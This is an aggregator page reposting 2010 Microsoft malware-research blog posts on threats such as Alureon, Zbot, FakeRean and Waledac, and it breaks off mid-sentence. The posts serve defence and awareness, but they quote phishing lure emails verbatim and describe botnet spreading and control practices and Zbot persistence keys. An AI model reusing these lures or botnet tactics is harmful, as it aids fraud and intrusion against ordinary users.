http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2010-05-22 06:16:31 - Microsoft Malware Protection Center : Last month we had reported good cleaning results against the Win32 Alureon rootkit, and this month we have more good numbers to share with the May edition of MSRT Similar to last month, we continued to add detection for newer variants of Alureon Variant Computers Cleaned Change Virus Win32 AlureonA 47,310 12pourcents Virus Win32 AlureonB 5,546 -40pourcents Virus Win32 AlureonF 20,717 -21pourcents Virus Win32 AlureonG 50,581 -32pourcents Virus Win32 AlureonH 155,394 100pourcents Alureon Trojans and Droppers 81,521 12pourcents Total 361,069 41pourcents IMAGE As can be inferred from the numbers, compared to last month, the new H variant is the most prominent in terms of prevalence There were several changes to the design of the rootkit to avoid detection and cleaning, revealing that the rootkit is still under active development and distribution One of the notable changes was to infect arbitrary system drivers instead of only the hooked miniport driver Expectedly, this can have negative side effects on the machine depending on the chosen driver For example, we ve seen some machines having their keyboard disabled as a result of an infection On other machines, Windows XP unexpectedly requests reactivation because the infection appears like a significant hardware change Moreover, the trend percentages also show that some older variants of the rootkit upgrade to the latest version relatively quickly after a new release However, the A variant is still prevalent because of its use with a different malicious payload, called zooclicker Overall the number of computer cleaned increased by a whopping 37pourcents compared to April due to a spurt in detection of the newest variant and as a result, Alureon climbed to the number 1 family spot in MSRT May IMAGE Continuing the trend from last month, more than two-third of the infections occur on machines running Windows XP This aligns with the findings from the Microsoft Security Intelligence Report which states that malicious software infection rates differ significantly for different versions of the Microsoft Windows operating system and infection rates for more recently released operating systems are consistently lower than previous ones, for both client and server platforms IMAGE The geographical location distribution is consistent with last month s statistics and still reflects the prevalence bias of the malware in English speaking country Moreover, the new family for this month, Win32 Oficla was cleaned from 74,690 machines In total, MSRT May cleaned malware infections from 1,961,243 machines and below are the top most prevalent threat families cleaned with MSRT in May Family Machines Cleaned Alureon 356,959 Frethog 321,600 Taterf 261,553 Rimecud 225,005 As always, we strongly urge users to run the latest version and updated signatures of an Anti-Malware product such as our Microsoft Security Essentials in order to stay protected - Vishal Kapoor and Joe Johnson IMAGE http://www.secuobs.com/revue/news/224658.shtmlhttp://www.secuobs.com/revue/news/224658.shtml Secuobs.com : 2010-05-13 06:12:29 - Microsoft Malware Protection Center - The family added to this month's MSRT release is Win32 Oficla, which is a downloader that is able to receive download 'tasks' from a control server In the wild, variants of Win32 Oficla have been observed to download variants from families such as Win32 Cutwail, Win32 Zbot, Win32 Alureon, Win32 FakeScanti and Win32 FakeRean The Win32 Oficla package, which includes the software infrastructure to manage and control the Oficla drones, is sold online The controller is able to inspect various statistics from a given set of drones via a browser-based interface The interface also has the ability to initiate and maintain different download tasks that Win32 Oficla will be directed to perform The author s of Win32 Oficla appear to have initiated advertising their 'wares' online in April 2009 The asking price at that point in time was between 450- 700 USD, depending on the version Win32 Oficla is often delivered as a file attachment within an e-mail message of spam campaigns Many of the e-mail lures employed are those with parcel delivery for example, UPS, DHL, etc themes These are the very same lures observed as part of Win32 Bredolab campaigns, which may explain some confusion between these two malware families Here are a couple of different emails from the last week iTunes lure Subject Thank you for buying iTunes Gift Certificate Body Hello You have received an iTunes Gift Certificate in the amount of 5000 You can find your certificate code in attachment below Then you need to open iTunes Once you verify your account, 5000 will be credited to your account, so you can start buying music, games, video right awayiTunes StoreContract lure Subject Open an account Body Dear Customers, We have prepared a contract and added the paragraphs that you wanted to see in it Our lawyers made alterations on the last page If you agree with all the provisions we are ready to make the payment on Friday for the first consignment We are enclosing the file with the prepared contract If necessary, we can send it by fax Looking forward to your decision Stay safe out there - Scott Molenkamp IMAGE http://www.secuobs.com/revue/news/221713.shtmlhttp://www.secuobs.com/revue/news/221713.shtml Secuobs.com : 2010-05-12 04:55:14 - Microsoft Malware Protection Center - On the newly published Volume 8 of the Microsoft Security Intelligence Report SIR , you will find a familiar observation on malware infection across Windows operating systems, based on the Microsoft Windows Malicious Software Removal Tool MSRT , one of the datasets that contributed to the SIR SIR - infection rates by OS What's new is the first appearance of Windows 7 and Windows Server 2008 R2, both released in late 2009 Data shows that Windows 7 is less likely to be infected by malware compared to the earlier client OSes, and Server 2008 R2 less likely to be infected than older versions of server OSes For example, the CCM for Server 2008 R2 was 18 read as out of 1,000 MSRT executions on Server 2008 R2, 18 machines were detected with infection of prevalent malware covered by the MSRT detection capability vs the CCM of 30 for Server 2008 SP2 and 36 for Server 2008 RTM There are other takeaways from this figure 1 A newer OS with a higher service pack which includes the fixed security vulnerabilities in security updates at the time of issue in general is less likely to be infected 2 A 64-bit OS with security hardening like PatchGuard and Data Execution Prevention is more resilient to malware than its 32-bit counterpart one exception is Windows Server 2003 SP2 where CCM on X64 is higher than on X86, which was called out in the SIR as a reflection of the increasing dominance of 64-bit computers in the general server population and the accompanying relegation of 32-bit server platforms to specialized situations 3 A server OS usually in a more locked down environment is safer than the client OS This is a consistent observation since the inception of the SIR For more information, read on at http wwwmicrosoftcom sir Scott Wu IMAGE http://www.secuobs.com/revue/news/221228.shtmlhttp://www.secuobs.com/revue/news/221228.shtml Secuobs.com : 2010-05-01 00:06:27 - Microsoft Malware Protection Center - Following up on the blog post that our friends in the Microsoft Security Response Center posted a few weeks ago, we wanted to share the results from the April edition of MSRT As part of our ongoing updates to families already in MSRT, we have added support for more variants of the Win32 Alureon rootkit infector, including the ones responsible for the issues widely reported with Microsoft Security Bulletin MS10-015 Below is a summary of the Alureon cleaning using MSRT in April Variant Computers Cleaned Virus Win32 AlureonA 43,620 Virus Win32 AlureonB 7,297 Virus Win32 AlureonF 36,586 Virus Win32 AlureonG 102,549 Alureon Trojans and Droppers 72,917 Total 262,969 IMAGE We had also previously mentioned in our blog post, that although the Alureon family has been around for years, some variants A-F gained a lot of attention since they conflicted with Microsoft Security Bulletin MS10-015 and rendered machines unbootable after applying updates to ntoskrnlexe Within a few days, the rootkit authors updated Win32 AlureonG to avoid the issue since it was attracting a lot of unwanted attention Moreover, Microsoft also re-released Microsoft Security Bulletin MS10-015 with new heuristic checks included in the installer identifying symptoms of the rootkit, preventing the patch from being applied to the affected users while warning them of the issues The recently released Microsoft Security Bulletin MS10-021 also demonstrates a similar behavior The good news however, is that once MSRT April installs and cleans Alureon from the machine, these patches can be installed successfully to secure the machines IMAGE It can be inferred from the chart that around two thirds of the total infections occurred on Windows XP A quick look at the manifest on a sample installer reveals that the malware explicitly requests elevation to install This reiterates the necessity to employ security best practices such as User Account Control UAC to thwart the malware IMAGE Analyzing the geographical location distribution, it can be construed that the majority of the infections occur in English speaking countries Since the rootkit installers frequently include quotations from Hollywood pop culture, it is apparent that the authors are intimately familiar with the latest US pop culture trends Apart from tackling the Alureon variants, the newly added threat family for this month, Win32 Magania, was cleaned from 43,394 machines In total, MSRT April cleaned malware infections from 3,168,563 machines since it was released on the 13th of this month Below are the top six most prevalent threat families cleaned with MSRT in April Family Computers Cleaned Frethog 831,289 Taterf 372,597 Alureon 262,969 Rimecud 250,603 Hamweq 225,104 Four out of the top five, Frethog, Taterf, Rimecud and Hamweq, are worms taking advantage of propagation mechanisms that traditionally lead to outbreaks These worms use shared mapped drives, removable devices, autorun behaviors, all of which are common attack surfaces that we ve combated for years We highly recommend reading the section Protecting Against Malicious and Potentially Unwanted Software in the latest edition of the Microsoft Security Intelligence Report which provides great advice on preventing the spread of infections and tackling malware in general to ensure you and any users you may support stay fully protected Joe Johnson Vishal Kapoor IMAGE http://www.secuobs.com/revue/news/217854.shtmlhttp://www.secuobs.com/revue/news/217854.shtml Secuobs.com : 2010-04-27 03:45:03 - Microsoft Malware Protection Center - The eighth volume of the Microsoft Security Intelligence Report is going live today Inside, you ll find 248 pages of in-depth information about malware, spam, malicious Web sites, vulnerabilities, and exploits that are relevant to the Windows platform This volume contains a new Mitigation Strategy section that provides collective advice and best practices from our own Microsoft IT organization along with other security experts from all around Microsoft We ve also greatly expanded our international coverage section for malware distribution You ll find detailed analysis for 26 countries around the globeBe sure to check out the Key Findings Summary to get a good overview of the highlights We ll be posting some additional pieces to this blog to provide in-depth analysis for other sections over the next few weeks, so stay tuned The key findings and full report can be found at http wwwmicrosoftcom sir IMAGE http://www.secuobs.com/revue/news/216250.shtmlhttp://www.secuobs.com/revue/news/216250.shtml Secuobs.com : 2010-04-23 12:01:10 - Microsoft Malware Protection Center - There have been many instances where a virus infects an unintended target this time it's a variant of Virus Win32 Huhk As the name indicates, this virus usually attempts to infect x86 PE files I came across a sample which contains the virus code, but there was something different about it Header from infected file Yes, the infected file is a Windows CE binary for the ARM architecture When virus writers don't perform more than the basic checks such as ensuring the file is a windows executable PE Check we end up with corrupt infections that can be difficult to clean In such cases it's best to restore from backup Note this also means that the virus code will not execute correctly on an ARM processor, when the infected host is run - Raymond Roberts IMAGE http://www.secuobs.com/revue/news/215356.shtmlhttp://www.secuobs.com/revue/news/215356.shtml Secuobs.com : 2010-04-13 23:22:19 - Microsoft Malware Protection Center - Well kids it s that time of the month again MSRT Tuesday Continuing the trend on from last month, the target du jour is password stealers that target online games we like to do these things in groups you see Our motif for this month is a lovely shade of grey I call password stealer , with juxtapositions of process injection, with a penchant for passwords of the online game variety but of course we are referring to PWS Win32 Magania, mon ami Win32 Magania is another delivery mechanism used by various online game password stealers Unfortunately, this probably means that if you re infected with it, it s brought a few malicious friends along for the ride It also means that you should be changing your online passwords as soon as you can, once you're sure the machine is no longer infected, of course If you haven t already, one way to help ensure you re not infected is to download and install our available-at-no-charge antivirus product Microsoft Security Essentials I know, I m relentless with the shameless plugs, but I m a nice person despite that Stay safe out on the intertubes kids, Matt McCormack MMPC Melbourne, Australia IMAGE http://www.secuobs.com/revue/news/211720.shtmlhttp://www.secuobs.com/revue/news/211720.shtml Secuobs.com : 2010-04-07 04:00:27 - Microsoft Malware Protection Center - Last February, our colleague Chun blogged about trojanDownloader Win32 ChekafeA, which checks if the system is in an Internet Cafe and if so, downloads password-stealing trojans related to MMORPG online games Now, we look deeper into one of the downloaded trojans, which is PWS Win32 OnLineGamesGP example SHA1 935c02f86ed1212237a6a78801f41eb4a43d9ade PWS Win32 OnLineGamesGP, just like other password-stealing trojans, monitors certain processes related to MMORPG online games in order to steal account information, the account password, character status and gold count From way back, we've seen the transformation of these password-stealing trojans from logging keystrokes to monitoring window names and even adding worm capabilities Lately we have observed that aside from the abovementioned arsenal, PWS Win32 OnLineGamesGP patches specific DLL files What do we mean when we say patch Patched files in this case are files to which a tiny piece of malicious code has been inserted For the case of PWS Win32 OnLineGamesGP, it patches a DLL file including but not limited to the following dsounddll ddrawdll d3d9dll The patched malicious code usually tries to execute or load the dropped components of PWS Win32 OnLineGamesGP The patched DLL files are detected as variants of the Virus Win32 Patchstart or Virus Win32 Patchload family Now why patch only these particular files The answer is that these DLL files are related to DirectX Then, why patch DirectX-related DLL files The reason is that most online games are likely to use DirectX to render advanced graphics in the game Since this trojan targets online games, it s more likely that these DLL files are loaded when the game starts In effect, this enables the password-stealing trojan to load as well Every time the game is played the malware is also activated Here are the common games we ve seen that are being targeted Aion DNF Lineage Perfect World These games are very popular in Asia Looking through the geographic location of detections found from Dec 2009 to March 2010, it s pretty similar for all the malware families we ve mentioned Patchstart patchload OnlineGamesGP Based on the geographic distribution on all 3 charts, a huge percentage of infections are found in China For PWS Win32 OnLineGamesGP, China and USA are most affected by the threat In case you suspect that you have been hacked or infected by this type of malware, we highly suggest that you change your account password immediately You can also use our free online scanner as well as Microsoft Security Essentials at no charge to check for and remove these threats You can also send us samples of the files if you suspect that they are malicious or have been infected Enjoy playing Level up Elda Dimakiling and Francis Tan Seng IMAGE http://www.secuobs.com/revue/news/209555.shtmlhttp://www.secuobs.com/revue/news/209555.shtml Secuobs.com : 2010-03-30 23:47:47 - Microsoft Malware Protection Center - On March 9, Microsoft started investigating reports of targeted attacks using a previously undisclosed vulnerability CVE-2010-0806 affecting Internet Explorer 6 and 7 Internet Explorer 8, Windows 7, and Windows Server 2008 R2 are not susceptible As a member of the Microsoft Active Protections Program MAPP , the MMPC and other members received information about the vulnerability and immediately deployed protection for our customers We ve been tracking exploit attempts against this vulnerability since then, working with MSRC to monitor the state of attacks When proof-of-concept code became available in public exploit testing tools on March 10 and by March 12, the attack landscape escalated Mitigating signatures providing protection for this issue are Exploit JS CVE-2010-0806 and Exploit JS MultCR These signatures protect customers through Microsoft Security Essentials, Microsoft Forefront Client Security, Windows Live OneCare, the Forefront Threat Management Gateway, and the Windows Live Safety Platform Targets have spanned over 50 countries, but the most frequently targeted computers have been in China and Korea, with the US trailing a distant third place image Unprotected users are susceptible to infection when they browse to a malicious Web page that attempts to exploit this vulnerability If the exploit is successful, a number of malware families may be installed on the victim s computer The majority of malware downloaded after a successful exploit are trojans Some of the variants we have seen are Trojan Win32 Wisp TrojanDropper Win32 Lisiu TrojanDropper Win32 Agentgen I TrojanDownloader Win32 Smallgen AZ Backdoor Win32 AgentFS TrojanDropper Win32 Frethog Like the lifecycle of most vulnerabilities, we expect the threat landscape to mellow with the release and adoption of updates and protection We encourage you to apply Microsoft Security Bulletin MS10-018 as soon as possible and install an anti-virus solution, such as Microsoft Security Essentials, to protect yourself from these threats You can also get free virus-related assistance from Microsoft through Microsoft Help and Support -Holly Stewart, MMPC IMAGE http://www.secuobs.com/revue/news/207092.shtmlhttp://www.secuobs.com/revue/news/207092.shtml Secuobs.com : 2010-03-16 23:57:36 - Microsoft Malware Protection Center - Today we are going to take a closer look at bots and botnets On the black market, selling bots and botnets is quite profitable, which makes creating them a popular activity for criminals It helps that bot sources and creation kits are available on the Internet, allowing even script kiddies to create their own botnets Another reason bots get created is that some people who get bored in their daily lives tend to do things that in their opinion might earn them respect or admiration in front of their peers or in various Internet chat rooms Let's just clarify briefly what we mean when we say bot and botnets A botnet is a set of computers controlled by a command and-control C C computer to execute commands as directed The C C computer can issue commands directly or by using a decentralized mechanism Computers in the botnet are often called bots or zombies A bot herder or bot master is the person who controls the botnet One common way botnets spread is through torrents Even though it might not seem too productive in terms of bots per day, it's one of the easiest In this context there are two categories of bot herders the newcomers and those that have been in the field for quite some time Those that are new to this activity just seed an infected torrent, which the webmaster will take out This means that in a very short time the infected torrent is removed and their account is banned The guys that know what they're doing seed several clean torrents and from time to time they seed an infected one Basically they're trying to imitate what a normal uploader does By building and having a good reputation as an uploader seeder, their account won't be banned so easily Other popular ways of spreading are through YouTube, various chat rooms, and social networks Functionality can be added to bots so they spread faster through instant messenger programs and USB sticks removable drives These methods are more efficient in terms of how many computers get infected per day In order to control all those infected computers some criminals may buy offshore virtual private server VPS systems They can get these for as little as 10 USD per month most probably paid with stolen credit cards or PayPal accounts and with full root access Once the IP from their VPS is reported and banned for botnet activity , the criminals can buy another one That's also one of the reasons that they use dynamic DNS, so if one IP gets banned, in a matter of seconds they can have another system up and running and linked to the domain name After that, it's trivial to set up a Web interface with PHP and SQL server on the VPS For example, some versions of Zbot come with a multi-language Web panel that allows the herder to easily view and control the zombies The bot master has at his or her disposal information about the infected systems OS version, OS language, country, IP, latency, online time, etc and is able to send various commands download and execute files, execute local files, block URLs, reboot shutdown the system, etc You can read more on the Zbot family here Another way to control all those zombies is through password-protected IRC channels In some cases this method might be preferred because there is no need to buy anything and it allows for the same degree of control, although it doesn't offer the same good-looking interface Using an IRC client, an attacker might be able to easily control several botnets at once, just by switching from one window to another After creating a bot army, the bot master can sell or rent the bots for as cheap as 10c bot Most of those guys usually have tens or possibly hundreds of infected computers at their disposal, but there are people who control thousands or tens of thousands of computers and possibly even more It's not that easy to get such high numbers Most bots are quickly detected and removed from the infected systems That's why there is a continuous struggle in the criminal's world to develop and use obfuscators to make the bots harder to detect by antivirus programs Another way to fight botnets is by taking down their ISPs or those ISPs that are protecting these criminals Exactly this happened to the Troyak ISP last week, and even though those command-and-control servers are most likely going to be back online, it will take some time until they will regain their strength That's why we recommend installing an antivirus solution like Microsoft Security Essentials, to stay protected from such pests -- Andrei Saygo IMAGE http://www.secuobs.com/revue/news/202374.shtmlhttp://www.secuobs.com/revue/news/202374.shtml Secuobs.com : 2010-03-16 05:24:59 - Microsoft Malware Protection Center - Recently, following an investigation to which various members of the MMPC contributed, Microsoft s Digital Crimes Unit initiated a takedown of the Waledac botnet in an action known as Operation b49, an ongoing operation to disrupt the botnet for the long term The takedown also marked a new phase of exploration in combating botnets, which we call Project MARS short for Microsoft Active Response for Security While it is still too early to know the entire scope of this particular takedown's impact, early returns show that Operation b49 has been delivering on the disruption of Waledac and helping to map new territory in the fight against botnets I wanted to update you on what we know and what we are still learning regarding the impact of that fight To effectively counter a botnet like Waledac, we knew a multi-layered approach was needed one that included peer-to-peer communication disruption through technical countermeasures, domain-level takedowns to disrupt the phone home communications between zombie PCs and the command and control servers for Waledac, and traditional server takedowns to sever the back-end command and control mechanisms most directly under the control of the bot master s With the caveats that there are rarely, if ever, any absolutes regarding botnets and that we are still analyzing and investigating the impact of this action, early data from Microsoft and other researchers indicate that our actions have effectively decimated communications within the Waledac bot network For example, researchers from the Shadowserver Foundation, the Technical University in Vienna, University of Mannheim, University of Bonn and University of Washington have analyzed honeypot data on Waledac and have observed an effective cessation of commands to Waledac 'zombies' That s good news because it indicates that Operation b49 effectively severed between 70,000 and 90,000 computers from this botnet, meaning that those customers are less likely to see rogue security software pop-ups, malware downloads, outgoing spam and ID and password theft associated with the Waledac botnet infection We ve also been tracking Operation b49 s impact on the symptoms of Waledac infection symptoms that include malware downloads, identity theft and spam attacks from infected computers to other victims Researchers at Sudosecure who track new Waledac infections have data showing a dramatic decline in new IP addresses appearing within the Waledac network, meaning that Waledac is no longer spreading its infection to other computers While there will likely always be some fluctuations as long as the underlying malware exists and we must and will continue to work with the security community to stay on top of Waledac over time, the 'zero new infections' number reported by Sudosecure as of February 27 is a great indicator of the success of these efforts so far As for spam, the trends we ve been seeing since the takedown provide valuable insight into the nature of infections on zombie computers Waledac itself is just one of many sources of spam on the Internet and we never intended Operation b49 to appreciably shrink worldwide spam volumes The goal, rather, was to disrupt the bot and to learn from that disruption for future actions As we knew going in, the computers within the Waledac botnet are still infected with the original malware that gave herders control of them in the first place What we ve learned since the takedown from our initial data is that many of them are likely infected by other malware that may still be directing them to conduct attacks outside of Waledac s control structure We base this hypothesis on the evidence that honeypot computers infected only with Waledac are not sending spam nor getting commands to execute any other attacks However, Hotmail data and our examination of the behavior of all the known IP addresses for the previously infected Waledac computers show that about half of the computers once under the control of Waledac are still trying to send spam and are in fact doing so at higher levels today than they were in our December analysis Since spam campaigns have spikes and lulls, it s difficult to make direct comparisons of spamming behavior over time, but this data also seems to align with what we re hearing from others in the industry We ve also learned from this experience that our legal action has been successful in helping to sever to the command and control communications for Waledac at the domain level thus far In fact, since the original takedown occurred, we have worked with two affected domain owners Stephen Paluck and eNom to successfully address the problems with their respective domains and we have amended our legal filings to reflect that we are pursuing no further injunctive relief from the court on those domains See wwwnoticeofpleadingscom for all legal documentation and presented evidence in this case as it proceeds Other registered domain owners named in the legal filings have not yet exercised their due process rights by responding to the court, but the case is still ongoing Our goal with this lawsuit is to help promote a safer, more secure Internet, and we will continue to work toward that aim as we move forward in the case These and other findings demonstrate what, for us, is perhaps the most critical outcome of this case proof of concept As we forge ahead with Project MARS, we ll be looking to the lessons of Operation b49 as successful signposts along the road in this uncharted territory While no one action will wipe out every threat, any strong action to disable a botnet is significant progress and each action will inform the next For example, we ve also recently seen Spanish authorities take down another notorious botnet Mariposa with great success and we commend them for their valuable work These actions demonstrate how critical the incredible cooperation of stakeholders and experts all around the world is to success Look for more efforts like these as we work together to take a stand against botnets and make the internet safer and more secure for everyone Anyone concerned that their computer may be infected by malware should follow the protect your PC guidance available at http wwwmicrosoftcom protect Windows customers can also visit http wwwmicrosoftcom security malwareremove defaultaspx to find Microsoft's Malicious Software Removal Tool, which removes Waledac and other malware So, stay tuned The fight goes on --Jeff Williams IMAGE http://www.secuobs.com/revue/news/202032.shtmlhttp://www.secuobs.com/revue/news/202032.shtml Secuobs.com : 2010-03-12 04:28:43 - Microsoft Malware Protection Center - PWS Win32 Zbot aka Zeus WSNPoem is a password-stealing trojan that monitors for visits to certain Web sites It allows limited backdoor access and control and may terminate certain security-related processes In our collection, although we have some Win32 Zbot malware toolkit builder samples that date back to the 1st quarter of 2008, we already received and created detections for a number of Win32 Zbot samples from earlier - as early as the last quarter of 2006 an early SHA1 is 006227158415078de14b4fe889dfe8dedfcf4e0b Win32 Zbot evolves as it is circulated and maintained by a number of malicious and unrelated distributors, who use varying distribution vectors spam run, drive-by-downloads, exploits, etc Which, mind you, explains why this critter has weathered more than 3 years and is still around and active If you have been infected by this malware, well suffice it to say that you are not alone Our telemetry shows Win32 Zbot infections reported back by a number of our services have rocketed sky high as of late Zbot samples distribution from 2007 to present The geographical distribution of the above reported data also shows that almost 75 percent of Win32 Zbot infections are in the United States and United Kingdom This suggests there may be a language bias in the social engineering approach used by the distributors of this malware Zbot cumulative distribution by region Generally, each public build of Win32 Zbot produced by these kits can be categorized into how it copies and installs itself to the machine And normally the malware's default installation behavior is not easy to change and so the toolkit user opts not to bother with it anyway MOST if not all of them fall under one of the following variants as discussed in our encyclopedia entry Variant 1 Dropped Files ntosexe - Win32 Zbot wsnpoem videodll - configuration file wsnpoem audiodll - stolen data Registry Startup HKLM SOFTWARE Microsoft Windows NT CurrentVersion Winlogon userinit userinitexe, ntosexe, Example SHA1 006227158415078de14b4fe889dfe8dedfcf4e0b Variant 2 Dropped Files twextexe - Win32 Zbot twain_32 localds - configuration file twain_32 userds - stolen data Registry Startup HKLM SOFTWARE Microsoft Windows NT CurrentVersion Winlogon userinit userinitexe, twextexe, Example SHA1 50be83e3b1b71448375411120c436c04497b1ad9 Variant 3 Dropped Files twexexe - Win32 Zbot twain32 localds - configuration file twain32 userds - stolen data Registry Startup HKLM SOFTWARE Microsoft Windows NT CurrentVersion Winlogon userinit userinitexe, twexexe, Example SHA1 290d33efedd0281021940eba1d60a2091a991d0e Variant 4 Dropped Files sdra64exe - Win32 Zbot lowsec localds - configuration file lowsec userds - stolen data Registry Startup HKLM SOFTWARE Microsoft Windows NT CurrentVersion Winlogon userinit userinitexe, sdra64exe, Example SHA1 842f84c2c8d3be5e425787c6e9cac3d6a377e76e Remember Win32 Zbot's main objective is to steal sensitive information, including a user's online credentials Thus it makes sense that if you think your credentials have been compromised you should immediately change those on a clean and trusted system Microsoft offers the following services to keep you protected against current threats while using your computer Our online scanner, Microsoft Security Essentials and Microsoft Forefront Security Good luck and stay safe --Jireh Sanico PS While the best way to detect and clean a Win32 Zbot infection is to use an up-to-date antivirus scanner like we mentioned above, if you unable to do so, or if you suspect that you have a new or undetected Zbot infection, then you could use the following instructions These instructions help you to determine if you are infected by Zbot and to disable the malware before submitting a sample of the suspect file for our analysis Please note that manually modifying the registry is generally not recommended, and we urge you to use caution if you choose to do so One can do a quick check for the existence of this malware manually using Windows command prompt The configuration and data files tucked in their respective folders are hidden in Windows Explorer but can be seen using the DIR command zbot_pic0 A clean system by default should not have any unique ID made by the malware, so if you run the following REG QUERY HKLM SOFTWARE Microsoft Windows NT CurrentVersion Network v UID -- or -- REG QUERY HKCU SOFTWARE Microsoft Windows NT CurrentVersion Network v UID an infected machine would return the following data in the following format _ for example, COMP1_00038EB9 zbot_pic1 The userinit startup key specifies what program should be launched right after a user logs on to Windows Win32 Zbot adds its path into the data value and protects that value from being changed while it is active Running the following query returns the Zbot program in the below screenshot, it is sdra64exe REG QUERY HKLM SOFTWARE Microsoft Windows NT CurrentVersion Winlogon v userinit zbot_pic2 Win32 Zbot injects code into running processes so a system reboot is the easiest way to take it out of memory, but first we need to disable and prevent it from loading during startup like so proceed with caution REG ADD HKLM SYSTEM CurrentControlSet Control Session Manager v PendingFileRenameOperations t REG_MULTI_SZ d c windows system32 sdra64exe 0 c windows system32 sdra64ex_ 0 zbot_pic3 The above command renames the malicious file c windows system32 sdra64exe to c windows system32 sdra64ex_ when the system is restarted so there is now a chance to throw the malware our way Note that if the malicious file is not sdra64exe , you'll have to substitute the Zbot file name in your computer IMAGE http://www.secuobs.com/revue/news/200984.shtmlhttp://www.secuobs.com/revue/news/200984.shtml Secuobs.com : 2010-03-10 04:51:39 - Microsoft Malware Protection Center - Back in August 2009 we added a rogue called Win32 FakeRean to the list of families removed by MSRT At the time, I wrote about how it used several different names, like Home Antivirus 2010 and PC Antispyware 2010, which all looked pretty much the same This is a trick used by most modern rogues I covered it in some detail in my presentation at Virus Bulletin conference last September Alongside the use of different names, we've seen some rogues introduce different versions for different operating systems FakeRean now uses individual names and looks for Windows XP, Windows Vista and Windows 7 however, rather than distribute multiple versions for each of these three platforms, FakeRean's creators have taken an all-in-one approach The latest version of FakeRean chooses randomly from a list of 11 names each time it is installed It then inserts a string into the name that is dependant on which version of Windows it is running on The result is that a single version of the rogue can use any one of 33 different names Platform Windows 7 Platform WIndows Vista Platform Windows XP Win 7 Internet Security 2010 Vista Internet Security 2010 XP Internet Security 2010 Win 7 Internet Security Vista Internet Security XP Internet Security Win 7 Antivirus Pro 2010 Vista Antivirus Pro 2010 XP Antivirus Pro 2010 Win 7 Antivirus Pro Vista Antivirus Pro XP Antivirus Pro Win 7 Antivirus 2010 Vista Antivirus 2010 XP Antivirus 2010 Win 7 Antivirus Vista Antivirus XP Antivirus Win 7 Defender 2010 Vista Defender 2010 XP Defender 2010 Win 7 Guardian Vista Guardian XP Guardian Win 7 Guardian 2010 Vista Guardian 2010 XP Guardian 2010 Antivirus Win 7 2010 Antivirus Vista 2010 Antivirus XP 2010 Win 7 Antispyware 2010 Vista Antispyware 2010 XP Antispyware 2010 Along with each name comes a slightly different user interface to match, but for the most part they are very similar Here is the fake scanner on Windows XP Fake scanner displayed by Win32 FakeRean on XP systems This is what it looks like on Windows 7 Fake scanner displayed by Win32 FakeRean on Windows 7 systems The exception is when it comes to interface elements that imitate parts of the operating system On Windows XP, for example, FakeRean displays an imitation of Windows XP's Security Center Fake Windows Security Center displayed by Win32 FakeRean on systems running Windows XP When running on Windows 7, it displays a fake copy of the Action Center Fake action center displayed by Win32 FakeRean on systems running Windows 7 Note that the above screenshots and the list of names are all from one sample of FakeRean, SHA1 4fbd83a86dbefa058f3f33c4b950159b8882635a This is another example of the increasing sophistication of this type of malware FakeRean has also introduced another way of ensuring it is automatically started It modifies the registry to associate exe files with its own executable, so the rogue is run whenever any program is launched Unlike other rogues, such as Win32 FakeScanti, it doesn't just use this technique to block other programs from running, but if the rogue is removed without restoring the registry then exe files can no longer be run The EXE file extension needs to be re-associated in order to restore normal functionality Please see our encyclopedia entry for further detail -Hamish O'Dea IMAGE http://www.secuobs.com/revue/news/200107.shtmlhttp://www.secuobs.com/revue/news/200107.shtml Secuobs.com : 2010-03-09 23:21:55 - Microsoft Malware Protection Center - Greetings purveyors of the Internet Welcome to another thrilling installment of MSRT Miami , aka What's new in MSRT this month It's Win32 Helpud What, anti-climactic Perhaps However that doesn't take away from the importance of this addition to MSRT we're extending our coverage of online game password stealers Now, Win32 Helpud is not new to the malware scene It's been around for a couple of years now and consistently maintains a presence on our radars You may recall Win32 Helpud was one of a few families that were linked with exploiting the MS08-078 Internet Explorer vulnerability back in the day The fact that it's still lurking around almost 2 years later is one of the reasons we've decided to target Helpud with MSRT it's not going away of its own accord Why is that Well, the main reason is because of how it's used Helpud is a delivery mechanism used by other, affiliate, game password-stealers We still see it because the business model is an effective one give us your money, and we distribute and install your malware Hardly original, but simple and apparently effective enough to keep the business afloat So what does this mean if MSRT finds Win32 Helpud on my machine I hear you ask Well, many of these affiliate game password-stealers are already included in MSRT How about that Convenient, eh Almost like it was pre-planned Imagine that However, as always, we still recommend our users install an antivirus solution being wary of rogue scanners such as this one Might I take this opportunity to shamelessly plug our offering of an effective antivirus product, Microsoft Security Essentials Oh, I can Thanks Stay safe out there in the tubes kids, Matt McCormack MMPC Melbourne IMAGE http://www.secuobs.com/revue/news/199952.shtmlhttp://www.secuobs.com/revue/news/199952.shtml Secuobs.com : 2010-03-09 09:04:42 - Microsoft Malware Protection Center - While recently analyzing a malicious PDF file, I noticed a vulnerability exploited by the sample which I've never encountered before After a bit of research I came to the conclusion that this specific sample exploited CVE-2010-0188 This is a fresh vulnerability, information about which was just published this February It is described as possibly leading to arbitrary code execution, which is exactly what s happeningWhen the PDF file is loaded, Adobe Reader opens and then closes, while an executable file named aexe is dropped directly onto the C drive The dropped executable, which is actually embedded into the PDF file, tries to connect to a biz registered domain to download other files JavaScript is again used to successfully exploit this vulnerability, so disabling it for unknown documents might be a good idea We currently detect the malicious file as Exploit Win32 PidiefAX SHA1 908ae499a474e3006253417c658e055a633e75a1 and the dropped malware as TrojanDownloader Win32 QaantizAFortunately Adobe has released an update to address the vulnerability which is offered automatically to all users Read Adobe's security bulletin here and upgrade to the latest version of Adobe Reader and Acrobat Users can pull down the 'help' menu and click on 'check for updates' to ensure that they're running the latest versionAs good practice, we advise every user to always update their programs as well as their operating system We also advise users not to open files whose origins they don't trustMarian Radu MMPC Dublin IMAGE http://www.secuobs.com/revue/news/199666.shtmlhttp://www.secuobs.com/revue/news/199666.shtml Secuobs.com : 2010-03-04 21:59:20 - Microsoft Malware Protection Center - In January this year, the MMPC added Win32 Rimecud to MSRT's removal capability As previously discussed by Marian, this worm propagates mainly via removable devices, IM, and P2P channels and utilizes backdoor functionality to communicate with a C C server It differs from other bots in that it does not use a standard IRC protocol for its command and control functions Between January and February this year the MSRT alone reported over 1 million distinct machines disinfected from this worm Family Threat Count Computers cleaned Win32 Rimecud 1,183,728 1,031,097 The Mariposa botnet criminals presumably use a number of different threats, but it appears to be primarily Win32 Rimecud It is great to see our industry colleagues moving in the same direction to address these disruptive threats Rimecud isn't particularly new and the criminals apparently were trading their goodies at their counter We first observed Win32 Rimecud in November 2008 Win32 Rimecud reports prior to inclusion in MSRT As a result of this monitoring and other assessment, we added Rimecud to the MSRT detection list in January Here is what 